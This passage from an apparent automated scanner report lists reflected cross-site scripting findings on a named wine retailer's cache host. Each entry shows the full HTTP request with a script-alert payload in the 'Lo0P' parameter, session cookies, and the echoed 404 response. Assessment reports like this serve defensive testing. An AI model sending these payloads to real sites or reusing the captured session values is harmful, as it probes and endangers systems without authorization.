Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmb=139987105; __utmc=139987105; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 265
Date: Mon, 14 Feb 2011 17:16:06 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/css/homeNavRtArrow.jpg?Lo0P=9cd12<script>alert(1)</script>cee0b6c74f6 was not found on this server.<P>
...[SNIP]...

1.53. http://cache1.wine.com/images/css/homeNavTop.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/css/homeNavTop.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload e2408<script>alert(1)</script>86a64488141 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/css/homeNavTop.gif?Lo0P=e2408<script>alert(1)</script>86a64488141 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 261
Date: Mon, 14 Feb 2011 17:16:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/css/homeNavTop.gif?Lo0P=e2408<script>alert(1)</script>86a64488141 was not found on this server.<P>
...[SNIP]...

1.54. http://cache1.wine.com/images/css/homeNavTopDark.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/css/homeNavTopDark.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload a9a89<script>alert(1)</script>1e67ffe411c was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/css/homeNavTopDark.gif?Lo0P=a9a89<script>alert(1)</script>1e67ffe411c HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 265
Date: Mon, 14 Feb 2011 17:16:21 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/css/homeNavTopDark.gif?Lo0P=a9a89<script>alert(1)</script>1e67ffe411c was not found on this server.<P>
...[SNIP]...

1.55. http://cache1.wine.com/images/css/twiiterIcon.png [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/css/twiiterIcon.png

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload c5b0f<script>alert(1)</script>98c67228d6c was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/css/twiiterIcon.png?Lo0P=c5b0f<script>alert(1)</script>98c67228d6c HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmb=139987105; __utmc=139987105; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 262
Date: Mon, 14 Feb 2011 17:16:06 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/css/twiiterIcon.png?Lo0P=c5b0f<script>alert(1)</script>98c67228d6c was not found on this server.<P>
...[SNIP]...

1.56. http://cache1.wine.com/images/glo_icon_boutique_big.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/glo_icon_boutique_big.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 71b03<script>alert(1)</script>89ce984e47a was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/glo_icon_boutique_big.gif?Lo0P=71b03<script>alert(1)</script>89ce984e47a HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 268
Date: Mon, 14 Feb 2011 17:16:49 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/glo_icon_boutique_big.gif?Lo0P=71b03<script>alert(1)</script>89ce984e47a was not found on this server.<P>
...[SNIP]...

1.57. http://cache1.wine.com/images/glo_icon_organic_big.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/glo_icon_organic_big.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload cea43<script>alert(1)</script>46509bea0df was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/glo_icon_organic_big.gif?Lo0P=cea43<script>alert(1)</script>46509bea0df HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 267
Date: Mon, 14 Feb 2011 17:16:36 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/glo_icon_organic_big.gif?Lo0P=cea43<script>alert(1)</script>46509bea0df was not found on this server.<P>
...[SNIP]...

1.58. http://cache1.wine.com/images/glo_icon_screwcap_big.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/glo_icon_screwcap_big.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 37bf3<script>alert(1)</script>9d56b3d0f60 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/glo_icon_screwcap_big.gif?Lo0P=37bf3<script>alert(1)</script>9d56b3d0f60 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 268
Date: Mon, 14 Feb 2011 17:16:32 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/glo_icon_screwcap_big.gif?Lo0P=37bf3<script>alert(1)</script>9d56b3d0f60 was not found on this server.<P>
...[SNIP]...

1.59. http://cache1.wine.com/images/glo_tn_top_corners_two.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/glo_tn_top_corners_two.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 3ecdb<script>alert(1)</script>77b4170955e was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/glo_tn_top_corners_two.gif?Lo0P=3ecdb<script>alert(1)</script>77b4170955e HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 269
Date: Mon, 14 Feb 2011 17:16:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/glo_tn_top_corners_two.gif?Lo0P=3ecdb<script>alert(1)</script>77b4170955e was not found on this server.<P>
...[SNIP]...

1.60. http://cache1.wine.com/images/gradiantBg.png [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/gradiantBg.png

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload d3039<script>alert(1)</script>bd5a837b3d6 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/gradiantBg.png?Lo0P=d3039<script>alert(1)</script>bd5a837b3d6 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmb=139987105; __utmc=139987105; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 257
Date: Mon, 14 Feb 2011 17:16:06 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/gradiantBg.png?Lo0P=d3039<script>alert(1)</script>bd5a837b3d6 was not found on this server.<P>
...[SNIP]...

1.61. http://cache1.wine.com/images/homepage/372x105_ipad.jpg [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/homepage/372x105_ipad.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 390d4<script>alert(1)</script>7ef77c96728 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/homepage/372x105_ipad.jpg?Lo0P=390d4<script>alert(1)</script>7ef77c96728 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 268
Date: Mon, 14 Feb 2011 17:16:33 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/homepage/372x105_ipad.jpg?Lo0P=390d4<script>alert(1)</script>7ef77c96728 was not found on this server.<P>
...[SNIP]...

1.62. http://cache1.wine.com/images/homepage/372x105_stewardship.jpg [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/homepage/372x105_stewardship.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload d3b0a<script>alert(1)</script>a6932290e19 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/homepage/372x105_stewardship.jpg?Lo0P=d3b0a<script>alert(1)</script>a6932290e19 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 275
Date: Mon, 14 Feb 2011 17:16:33 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/homepage/372x105_stewardship.jpg?Lo0P=d3b0a<script>alert(1)</script>a6932290e19 was not found on this server.<P>
...[SNIP]...

1.63. http://cache1.wine.com/images/homepage/bgkFooter.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/homepage/bgkFooter.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 1b489<script>alert(1)</script>4c3520ea41b was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/homepage/bgkFooter.gif?Lo0P=1b489<script>alert(1)</script>4c3520ea41b HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmb=139987105; __utmc=139987105; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 265
Date: Mon, 14 Feb 2011 17:16:07 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/homepage/bgkFooter.gif?Lo0P=1b489<script>alert(1)</script>4c3520ea41b was not found on this server.<P>
...[SNIP]...

1.64. http://cache1.wine.com/images/homepage/bgkSignUpBorder.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/homepage/bgkSignUpBorder.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 67148<script>alert(1)</script>a87fab69ea6 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/homepage/bgkSignUpBorder.gif?Lo0P=67148<script>alert(1)</script>a87fab69ea6 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmb=139987105; __utmc=139987105; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 271
Date: Mon, 14 Feb 2011 17:16:07 GMT
Connection: close
Vary: Accept-Encoding

